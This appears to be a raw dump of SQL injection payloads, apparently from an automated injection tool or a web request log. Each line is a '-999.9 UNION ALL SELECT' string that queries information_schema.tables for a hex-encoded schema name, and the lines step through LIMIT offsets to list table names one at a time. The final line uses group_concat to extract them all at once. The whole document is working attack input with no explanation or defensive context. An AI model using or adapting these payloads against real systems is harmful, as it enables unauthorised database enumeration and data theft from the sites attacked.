information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 126,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 127,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 128,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 129,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 13,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 130,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 131,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 132,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 133,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 134,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 135,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 136,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 137,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 138,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 139,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 14,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 140,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 141,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 142,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 143,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 144,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 145,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 146,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 147,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 148,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 149,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 15,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 150,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 151,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 152,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 153,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 154,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 155,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 156,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 157,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 158,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 159,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 16,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 160,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 161,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 162,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 163,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 164,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 165,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 166,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 167,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 168,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 169,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 17,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 170,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 171,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 172,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 173,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 174,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 175,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 18,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 19,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 2,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 20,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 21,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 22,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 23,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 24,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 25,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 26,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 27,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 28,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 29,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 3,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 30,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 31,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 32,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 33,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 34,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 35,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 36,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 37,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 38,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 39,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 4,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 40,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 41,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 42,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 43,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 44,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 45,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 46,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 47,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 48,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 49,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 5,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 50,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 51,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 52,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 53,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 54,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 55,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 56,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 57,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 58,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 59,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 6,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 60,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 61,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 62,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 63,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 64,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 65,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 66,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 67,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 68,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 69,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 7,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 70,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 71,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 72,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 73,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 74,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 75,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 76,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 77,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 78,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 79,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 8,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 80,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 81,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 82,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 83,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 84,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 85,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 86,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 87,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 88,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 89,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 9,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 90,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 91,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 92,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 93,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 94,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 95,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 96,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 97,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 98,1)-- -999.9 UNION ALL SELECT (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461 limit 99,1)-- -999.9 UNION ALL SELECT (select concat(0x7e,0x27,Hex(cast(group_concat(table_name) as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x636F6D6C617465725F6D61727461)-- -999.9 UNION ALL SELECT 